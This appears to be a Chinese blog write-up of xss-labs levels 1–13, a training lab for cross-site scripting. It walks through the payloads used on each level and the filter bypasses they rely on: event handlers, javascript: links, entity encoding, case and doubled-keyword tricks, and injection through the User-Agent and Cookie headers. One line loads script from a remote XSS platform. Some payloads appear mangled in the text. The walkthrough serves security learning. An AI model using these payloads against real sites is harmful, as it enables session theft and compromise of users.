xss-labs第1~13关

文章目录

    • 伪重点
    • 第1关
    • 第2关
    • 第3关
    • 第4关
    • 第5关
    • 第6关
    • 第7关
    • 第8关
    • 第9关
    • 第10关
    • 第11关
    • 第12关
    • 第13关

伪重点

<script>alert(1);</script>	//直接嵌入script

<script src=https://xsspt.com/MQzN0Z></script>		//从远程嵌入script

<input name=keyword value="" onmouseover="alert(1)">	//通过事件属性值传入script字符串

<a HREF=javascript:alert(1)>aaa</a>		//超链接


<a HREF=javasc&#114;ipt:alert(1)>aaa</a>	//html实体转义

第1关

xss-labs第1~13关_第1张图片

把test改为

直接过关。

xss-labs第1~13关_第2张图片

第2关

xss-labs第1~13关_第3张图片

用第一关的方法,不行了。右击鼠标看源码

xss-labs第1~13关_第4张图片

xss-labs第1~13关_第5张图片

发现1这个位置的<>被转码了

但是2这个位置没有,所以可以考虑把2当做输出点

先用">闭合value标签,再输出弹窗。

"><script>alert(1)script>

xss-labs第1~13关_第6张图片

第3关

输入' '' < >,查看源码,发现两个地方,"<>都被转码

xss-labs第1~13关_第7张图片

但是单引号作为闭合符没有被转码

于是想到了on事件。

'onclick='alert(1)

'onmouseover='alert(1)'

xss-labs第1~13关_第8张图片

第4关

xss-labs第1~13关_第9张图片

发现2这个地方,单引号,双引号还在,且双引号是闭合符

所以和第三关一样的做法,用on函数,只是闭合符换成了"

xss-labs第1~13关_第10张图片

第5关

xss-labs第1~13关_第11张图片

这一关在测试’ ‘’ < >是否正常显示时,发现都可以。

用第一关的方法试一试。却发现果然没这么简单,script被隔开了
xss-labs第1~13关_第12张图片

又想到了刚刚的67在文本框的外面出现,所以试试超链接行不行

"> 12<a href="javascript:alert(1)">34a>

成功

xss-labs第1~13关_第13张图片

第6关

用前面几关的方法来试,都不行

忽然发现1全是小写,2有大写有小写,想到了大小写绕过

xss-labs第1~13关_第14张图片

果然成功

xss-labs第1~13关_第15张图片

">

第7关

这一关也很简单,随便输入试试水,看到script直接就没了,立马就想到了双写绕过

xss-labs第1~13关_第16张图片

成功

xss-labs第1~13关_第17张图片

"><scscriptript>alert(1)</scrscriptipt>

第8关

经过尝试,发现添加友情链接后,点击友情链接,就会跳到刚刚添加的友情链接的位置

xss-labs第1~13关_第18张图片
xss-labs第1~13关_第19张图片

试水,script被过滤了。

xss-labs第1~13关_第20张图片

试试其他的方法。on事件也被过滤了,大小写也不行。看了看攻略,要用到转义字符

查ASCII表得:s是115
所以用javascript:alert(1)试试

xss-labs第1~13关_第21张图片成功

第9关

用第8关的方式

说链接不合法

xss-labs第1~13关_第22张图片

想到链接一般都有个http://或者https://
所以在前面加上http://,这次没有再说链接不合法,但是点击没反应。

xss-labs第1~13关_第23张图片这关有点尴尬,不加http://,链接就不合法;加了http://,语句结构就不合法。

查看万能的攻略,说应该把http://放在后面,注释掉。
因为后端只检测链接里面包含http://字段就行,注不注释掉没关系。而注释掉,语句结构就没问题了

javascript:alert(1)  //http:// 

javascript:alert(1)  /*http://www.baidu.com*/

xss-labs第1~13关_第24张图片

第10关

查看源码,<>被转码了,但是发现三个隐藏的input。

xss-labs第1~13关_第25张图片

给他们赋值(这应该是叫赋值吧)

xss-labs第1~13关_第26张图片

看源码,发现只有t_sort有反应

3换成" type="text" onmouseover="alert(1)

http://172.16.11.54/xss-labs/level10.php?keyword=4&t_sort=" type="text" onmouseover="alert(1)

xss-labs第1~13关_第27张图片

当鼠标经过name="t_sort"的时候,弹出弹窗,过关。

xss-labs第1~13关_第28张图片

第11关

同样查看源码,发现四个隐藏的文本框

分别赋值,还是只有t_sort有反应

172.16.11.222/xss-labs/level11.php?keyword=good job!&t_link=1&t_history=2&t_sort=3&t_ref=4

xss-labs第1~13关_第29张图片

那就用第10关的方法

http://172.16.11.222/xss-labs/level11.php?keyword=good job!&t_sort=" type="text" οnmοuseοver="alert(1)

不行,没反应,查看源码,双引号被过滤了

xss-labs第1~13关_第30张图片

查看攻略说要抓包,我正想参考这个攻略打开burpsuite,按F11的时候,不小心按到了F12。

既然url里面不能操作,那能不能直接在控制台里操作,将type改成text,加入onmouseover="alert(1)"

然后点击出现的文本框,成功弹出弹窗。也不知道这算不算成功过关

xss-labs第1~13关_第31张图片

第12关

用第10关的方法,同样发现只有t_sort有反应,但是t_ua这里有一串奇怪的东西

xss-labs第1~13关_第32张图片
用前面的方法都不行,抓包吧。

使用burpsuite抓包的时候,发现t_uavalueuser-agent的值有点像,是不是这里输出的就是user-agent的值呢?

xss-labs第1~13关_第33张图片

试一下

在user-agent的值后面加上 " type="text" onmouseover="alert(1)"

xss-labs第1~13关_第34张图片

果然成功

xss-labs第1~13关_第35张图片

第13关

经过前面几关的学习,看源码,抓包已经成为基本操作了

xss-labs第1~13关_第36张图片

发现t_cook的值和cookie的值有点意思

于是在cookie后面加上" type="text" onmouseover="alert(1)"

xss-labs第1~13关_第37张图片

果然成功

xss-labs第1~13关_第38张图片

你可能感兴趣的:(xss,xss)